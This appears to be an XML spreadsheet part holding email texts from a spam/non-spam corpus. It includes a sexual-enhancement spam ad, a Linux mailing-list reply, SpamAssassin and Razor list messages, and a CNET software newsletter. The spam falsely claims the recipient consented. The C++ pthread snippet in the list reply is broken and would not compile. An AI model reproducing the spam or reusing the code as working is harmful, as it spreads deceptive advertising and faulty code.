 y: Tahoma; border: 1 solid #FFFF99" bgcolor=3D"#FFFF99" align=3D"center"&gt;W=
 omen,
         Heighten Your Sexual Desire &amp;amp; Increase Your Sexual Climax!&lt;/td=
 &gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
         &lt;div align=3D"center"&gt;
           &lt;table border=3D"0" width=3D"99%" height=3D"44" bgcolor=3D"#FF00=
 00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"38" align=3D"center" bordercolo=
 r=3D"#FFFF99" style=3D"border: 1 solid #FFFF99" nowrap&gt;&lt;b&gt;&lt;font color=3D"#=
 FFFF99" size=3D"5" face=3D"Tahoma"&gt;&lt;a href=3D"http://www.medievalmedia.com=
 /" style=3D"color: #FFFF99; font-size: 14pt; font-weight: bold"&gt;CLICK
                 HERE to Get it While it's HOT!&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
         &lt;/div&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"0" width=3D"460" height=3D"99" cellspacing=3D"0" cellpa=
 dding=3D"0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"93" align=3D"center"&gt;&lt;font face=3D"Verd=
 ana" color=3D"#000000" size=3D"1"&gt;You
         are receiving this special offer because you have provided permiss=
 ion to
         receive email communications regarding special online promotions o=
 r
         offers. If you feel you have received this message in error, or wi=
 sh to
         be removed from our subscriber list, &lt;a style=3D"COLOR: #ff0000" h=
 ref=3D"mailto:print5@btamail.net.cn?Subject=3DUNSUBSCRIBE"&gt;Click
         HERE&lt;/a&gt; and you will be removed within less than three business d=
 ays.
         Thank You and sorry for any inconvenience.&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Are you using pthread_join(somethread,0);
 &gt; When you are closing off your instanciated thread made from
 &gt; pthread_t*somethread ?
 Something like this might help you out.... 
 Class la{
  Public:
 	pthread_t*thread;
 	void thread_me(int num)
 	};
 la*lala;
 typedef struct list
 {
  la*w;
  struct list*next;
 }list_struct;
 list_struct*head;
 void thread_me(int num);
 void add_to_list(la*o);
 void delete_from_list();
 int main(int argc,char**argv)
 {
 int a=1;
  lala=new la;
  thread= new pthread_t;
  add_to_list(lala);
  pthread_create(thread,0,&amp;lala.thread_me,&amp;a);
  thread= new pthread_t;
  add_to_list(lala);
  pthread_create(thread,0,&amp;lala.thread_me,&amp;a);
 delete_from_linked_list();
 return 0;
 };
 void lala::thread_me(int num)
 {
  printf("lalala");
  pthread_join((*this)-&gt;thread,0);
 return;
 };
 void add_to_list(la*o)
 {
  static list_struct*a;
  a=new list_struct;
  a-&gt;w=o;
  a-&gt;next=head;
  head=a;
 return;
 };
 void delete_from_linked_list()
 {
  list_struct*a;
  while(head!=NULL)
 	{
 	 a=head;
 	 head=head-&gt;next;
  	 delete a;
 	};
  return;
 };
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FYI - gone this weekend
</t>
  </si>
  <si>
    <t xml:space="preserve">I won't be reading email until Sunday night or so.  Good luck with
 2.40 and don't do anything I wouldn't do.  ;-)
 - Dan
</t>
  </si>
  <si>
    <t xml:space="preserve">On Saturday 07 September 2002 23:22 CET Daniel Quinlan wrote:
 &gt; Craig Hughes &lt;craig@hughes-family.org&gt; writes:
 &gt; &gt; How about configuring SA to set precendence to "low" for spam
 &gt; &gt; messages, then filter on that -- no real human I've ever seen has
 &gt; &gt; actually set precendence to low on real mail.
 &gt;
 &gt; Assuming there isn't a better way for Lotus Notes users, we could
 &gt; create a "Precedence: spam" convention.  The only two Precedence:
 &gt; headers I've seen (aside from one or two odd messages) are "bulk" and
 &gt; "list".  Adding a "spam" header makes sense given the convention.
 I'd suggest using Precedence: junk. Albeit it's no standard header does most 
 Software already recognize it. Courier eg. doesn't send auto-replies to 
 mails with the Precedence bulk or junk. I think Outlook does handle these 
 special, too. [1] says:
 | Autoresponses should always contain the header
 |          Precedence: junk
 | Notice the spelling of "prec-e-dence". In particular, count the number of
 | n:s (and a:s and s:es, if you're totally agraphic and/or from the United
 | States). This will prevent well-tempered mail programs from generating
 | bounce messages for these. If the recipient can't be reached, the
 | autoresponder message is simply discarded. 
 | [...]
 | (For what it's worth, the meaning of the Precedence header in practice is
 | that it affects Sendmail so that messages identified as less important get
 | moved back in the queue under high load. [...])
 &gt;[...]
 Malte
 [1] Moronic Mail Autoresponders (A FAQ From Hell):
 http://www.ling.helsinki.fi/users/reriksso/mail/autoresponder-faq.html
 -- 
 --- Coding is art.
 --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</si>
  <si>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Craig, 
 The problems with missing hashes are being addressed I write this. It
 should be fixed soon and it has nothing to do with TeS algorithms.
 cheers,
 vipul.
 On Thu, Aug 08, 2002 at 03:17:52PM -0700, Craig R . Hughes wrote:
 &gt; I'm talking specifically about the last ~24 hours where it seems 
 &gt; like things have not been working.  People who've been using the 
 &gt; Outlook plugin have been telling me they've been seeing really 
 &gt; bad performance, which I've been attributing to the problems 
 &gt; which have been discussed here and on sa-talk.  I'm not saying 
 &gt; it's completely not working, or that it has no chance of being 
 &gt; fixed 15 minutes from now, just that it's not currently working, 
 &gt; and there have been a number of "hiccup" periods in the last 
 &gt; couple months.  Plus, it's hard to deny that we don't know yet 
 &gt; if the trust network is going to work or not -- it only just got 
 &gt; switched on, and that changeover seems to have corresponded with 
 &gt; people noticing things have stopped working right.
 &gt; 
 &gt; C
 &gt; 
 &gt; On Thursday, August 8, 2002, at 01:44  PM, Jordan Ritter wrote:
 &gt; 
 &gt; &gt; On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:
 &gt; &gt;
 &gt; &gt; # Razor2 seems to have been a long time in coming, [...] and doesn't
 &gt; &gt; # currently work.
 &gt; &gt;
 &gt; &gt; Quite a strong statement, Craig, one which over 30,000 active users a
 &gt; &gt; day would strongly disagree with.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; --jordan
 &gt; &gt;
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 -- 
 Vipul Ved Prakash          |   "The future is here, it's just not 
 Software Design Artist     |    widely distributed."
 http://vipul.net/          |              -- William Gibson
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Software Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;html&gt;
 &lt;head&gt;
         &lt;title&gt;Software&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;div align="center"&gt;
 &lt;!-- DO NOT REMOVE OR ADJUST ANY CODE ABOVE THIS MARK --&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
         &lt;td width=442 colspan=4&gt;
                 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/hd.gif" width="442" height="60" border="0" alt="CNET Software Newsletter"&gt;&lt;br&gt;
                         &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
                                 &lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                                 &lt;tr&gt;
                                         &lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                                         &lt;td width=10 rowspan=2&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                                         &lt;td  width=430&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                                 &lt;/tr&gt;
                                 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;        
         &lt;/td&gt;
 &lt;td width=160 rowspan=2&gt;
 &lt;!-- ad --&gt;
 &lt;div align="center"&gt;&lt;img src="http://i.i.com.com/cnwk.1d/Ads/common/advertisement.gif" width="120" height="10" border="0"&gt;&lt;/br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj88OkFs6dYLYSS7ZMgtY8cR" target="new"&gt;   
 &lt;img src="http://www.techrepublic.com/images/ads/GoDaddy.gif.domainnames.gif" width="160" height="600" border="0"&gt;
 &lt;/a&gt;&lt;/div&gt;
 &lt;!-- /end ad --&gt;
                                 &amp;nbsp;&lt;br&gt;
 				&lt;!-- TOP DOWNLOADS --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_TOPdwnlds.gif" alt="Top Downloads" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="150" border=0 cellpadding=2 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=1f-rvwqI58wtiHXvAh1xmYgHobjqmZR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td width="100%25"&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=34-pJpSIcd8ldq3QUj3_tvVyn4IcgdR" &gt;Mozilla 1.0&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=49-ZM4cIEpSm4UtngNVX4RVXFO5JSrR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=5e-ssGdIn0656yzMeRhsnStcVTQzciR" &gt;mIRC 6.02&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=73-__ZeIBBtE5rttiOT8UEE0WNrUZlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=88-ec5PQQKxb5HfGXk-rU358atSBb9R" &gt;PolyView 3.8&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0uetRIoRsuKLvd75wKZzuR" &gt;&lt;img src="http://www.cnet.com/Images/Global/dl-15-bug.gif" height=15 width=15 valign=bottom border=0&gt;&lt;/a&gt;&lt;/td&gt;
 				&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=3&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0aTFWfzOAjM2cmpxUCPusR" &gt;FruitMenu 2.0 (for the Mac)&lt;/a&gt;&lt;/font&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;img src="http://www.cnet.com/b.gif" width=1 height=1&gt;&lt;br&gt;
 				&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				&lt;!-- /TOP DOWNLOADS --&gt;
 				 &lt;br&gt;
 				&lt;!-- EDITORS' CHOICE --&gt;
 				&lt;img src="http://www.cnet.com/i/dp/RHC_EdCHOICE.gif" alt="Editors' Choice" width="150" height="20" border="0"&gt;&lt;br&gt;
 				&lt;table width="100%25" border=0 cellpadding=3 cellspacing=0&gt;
 				&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- hardware --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWurnsBnANWtUoF24wxeZR" &gt;Dell Latitude C510/C610 series&lt;/a&gt;&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=dd-tpm0QzWdTbwg_vpGZP85eXsJh-uR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Hardware&lt;/font&gt;
 &lt;!-- /hardware --&gt;	
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- electronics --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWqr23OW70pvVdi5Z7edsR" &gt;Toshiba Pocket PC e310&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rqvUaghmEiqzUbrvLkiDZR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Electronics&lt;/font&gt;
 &lt;!-- /electronics --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- software --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr4T82lglbn9kgGa2oXqGdR" &gt;AutoCAD LT 2002&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsVaYB70lyLxjkqVAXXbcR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Software&lt;/font&gt;
 &lt;!-- /software --&gt;
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr valign=top&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;!-- wireless --&gt;
 				&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpD4HqQ8Rha1cN0535V0YiR" &gt;Sony Ericsson T68&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDBhFvY1jxCjjvDSwizzlR" &gt;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt;&lt;/a&gt;&lt;br&gt;
 				&lt;font size="-2"&gt;In Wireless&lt;/font&gt;
 &lt;!-- /wireless --&gt;				
 				&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 				 &lt;br&gt;
 				&lt;!-- /EDITORS' CHOICE --&gt;
         &lt;/td&gt;
         &lt;td width=9 rowspan=2&gt;
                 &lt;img src="http://www.cnet.com/i/dp/dd_c.gif" width="9" height="60" border="0"&gt;&lt;br&gt;
                 &lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
                         &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                         &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="9" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;                
         &lt;/td&gt;
         &lt;td width=1 bgcolor="#000000" rowspan=2&gt;
                 &lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
                         &lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
                 &lt;/table&gt;                
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section --&gt;
 &lt;tr valign=top&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=430 bgcolor="#ffffff"&gt;
                 &lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
                         &lt;tr valign=top&gt;
                         &lt;td width=10&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td width=412&gt;
                         &lt;img src="http://www.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
                         &lt;img src="http://www.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;font face="Arial, Helvetica" size="-2"&gt;July 15, 2002&lt;/font&gt;&lt;br&gt;
                         &lt;img src="http://www.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;
                                 &lt;table cellpadding=0 cellspacing=0 border=0 width=412&gt;
                                 &lt;tr valign=top&gt;
                                         &lt;td width=76 align=right&gt;
                                                 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/lindseyt.gif" width=66 height=86&gt;&lt;br&gt;
                                                 &lt;font face="arial, helvetica" size="-2" color="#666666"&gt;
                                                 --&lt;A HREF="mailto:software_mailbag@cnet.com"&gt;Lindsey Turrentine&lt;/A&gt;&lt;br&gt;
                                                 Senior editor&lt;br&gt;
                                                 CNET Software and Internet&lt;br&gt;
                                                 &lt;/font&gt;
                                         &lt;/td&gt;
                                         &lt;td width=10&gt;&amp;nbsp;&lt;/td&gt;
                                         &lt;td&gt;&lt;font face="Arial, Helvetica"&gt;
                                                 &lt;font color="#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 &lt;font size="-1"&gt;If the best things in life are free, why does software cost so
 much? Back in the day (that day being 1999, when the Internet was
 the Next Big Thing), you could get almost all of your
 software--e-mail, fax services, online desktops, you name it--for
 free. Now, even &lt;a href="http://clickthru.online.com/Click?q=71-GwdUIEZcoNyxIRpqwuBXvl3NU2rR" &gt;Yahoo&lt;/a&gt; is charging for some of its formerly free mail services, including the ability to check your Yahoo mail from Outlook or another desktop e-mail client.
 But if you look closely enough, you can still find some
 worthwhile free apps. We've reviewed &lt;a href="http://clickthru.online.com/Click?q=86-8fH1QCJoJ4geBdLSjaeTldfVpfRR" &gt;four free e-mailers&lt;/a&gt; to get you started. And we've also
 taken a peek at the new &lt;a href="http://clickthru.online.com/Click?q=9b-7-TFQSIo_AW0ILZ0dAVJ9PZAKTFR" &gt;BearShare&lt;/a&gt;, which is not only
 free itself, but also lets you share music and media files at no
 cost. Of course, whether you can find legal music to share is
 another matter entirely.
 &lt;br&gt;&lt;/font&gt;
                                                 &amp;nbsp;&lt;br&gt;
                                         &lt;/td&gt;
                              &lt;/tr&gt;
                                 &lt;/table&gt;
                         &lt;/td&gt;
                         &lt;td width=8&gt;&lt;img src="http://www.cnet.com/b.gif" alt="" width="8" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;/tr&gt;
                         &lt;/table&gt;
         &lt;!-- bottom rule --&gt;
         &lt;table cellpadding=0 cellspacing=0 border=0 width=430&gt;
         &lt;tr valign=top&gt;
                 &lt;td bgcolor="#F7D69C"&gt;&lt;img src="http://www.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;/table&gt;
 &lt;table border="0" width="100%" cellpadding="10" cellspacing="0"&gt;&lt;tr&gt;&lt;td&gt;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href="http://clickthru.online.com/Click?q=b0-NZmfQQJrcJ4Ye__dxQMKtNX8PQ9R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/p/050202chipart.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaAxrWAY6zSROUJEymxquR" &gt;&lt;b&gt;Intel's new insides: one size fits all?&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;The i845 chipset's many flavors are faster, better, and a lot more confusing. Read before you shop.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq24Hl99bbjsMVKpv3DxsR" &gt;Dell's prefab PC&lt;/a&gt;&lt;br /&gt;
 	&amp;#149; &lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkH9Zwv1NEqBxDVAmoBamZR" &gt;Apple cracks 1GHz&lt;/a&gt;&lt;br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popular&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="5" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;Desktops&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	1. &lt;a href="http://clickthru.online.com/Click?q=05-gDULIG8W7tfWN3RfnODtxI8fiiuR" &gt;Dell Dimension 8000 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	2. &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXHbC-1YxNd5q0_HZB17WsR" &gt;HP Pavilion 950 &lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	3. &lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzF0q58fIP26D_8gaZjMZR" &gt;Dell Dimension 4000 series&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	4. &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtit3ku77EMLKlXBDgnVnR" &gt;Atlas Micro CS 8000&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	5. &lt;a href="http://clickthru.online.com/Click?q=59-y53oIEntHtdfsN8lpW-B_KMqztrR" &gt;Falcon Northwest Mach V&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=6e-2aYjIyES_DPPeGFQA5K-fxuEL5iR" &gt;See all most popular desktops&lt;/a&gt;&lt;/b&gt;&lt;br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&lt;font face="Arial, Helvetica"&gt;                  
 &lt;img src="http://www.cnet.com/i/nl/sw/sub_feat.gif" alt="Feature" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href=" http://home.cnet.com/software/0-3227888-8-20089773-1.html"&gt;Roundup: CNET reviews four free Web e-mailers&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;Yahoo now charges for services that were once free; Hotmail
    dumps accounts without so much as an explanation. So-called
    free Web-based e-mailers aren't quite as free-wheelin' as
    before. Are the savings worth the hassle? We take another
    look at so-called "free" e-mailers.
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;!-- ad 2 --&gt;
 &lt;!-- /ad 2 --&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=83-U-BXQYJ71ZArjzMtuoAABMMPZ9FR" &gt;Get the gear you need to burn DVDs&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;DVD authoring is one of the hottest new hobbies around, but
    picking out the right equipment can be a daunting task.
    We've broken down the process and selected the best gear
    for the job, from camera to software, burner to DVD player.
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/i/nl/sw/sub_rev.gif" alt="Review" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=98-FTaOQ_za68wZ7dRCW5CH7esbKR9R" &gt;BearShare 4.0&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;The latest version of this oft-overlooked Gnutella client
    lets you pay $19.95 for ad-free file sharing and offers a
    nice, clean interface and a chat client to boot. Plus,
    BearShare lets you opt out of bundled adware and spyware
    when you install it. Should you run to this app like a bear
    to honey? Not yet. We'll tell you why.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEBSIFL-NRQhaIHsSzky0uR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEkRUaKmyFgVnxXFZcIuIsR" &gt;&lt;b&gt;Manufacturer price&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkDUmPkvyRmBekeVktk2ZR" &gt;Yahoo Mail&lt;/a&gt;&lt;/b&gt;&amp;nbsp;&lt;img src="http://www.cnet.com/Images/Global/ed_choice_13x13.gif" width=13 height=13 border=0 alt="Editors' Choice"&gt; &lt;br&gt;
 &lt;font size="-1"&gt;After months of beta testing and pricing adjustments (that's right, Yahoo now charges for some services), the new Yahoo Mail just hit the Web. Among its changes are a complete redesign, better Calendar and Address Book integration, and a new color palette. Find out if Yahoo still deserves your account.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ed-jLlvQgVqRkUeZaPxv3orMjEsaQuR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=02-qia9Ilj8ckKhl8S_XGuwrfzJ6nsR" &gt;Peachtree Complete Accounting 2003&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;For years, Peachtree has provided professional accounting to
    small businesses. As a result, Peachtree Complete 2003 has
    all the basics, including inventory control, time billing,
    and payroll management. And Peachtree even contains a wide
    array of Web tools for creating and maintaining an online
    store. What's new in 2003?
 &lt;br&gt;
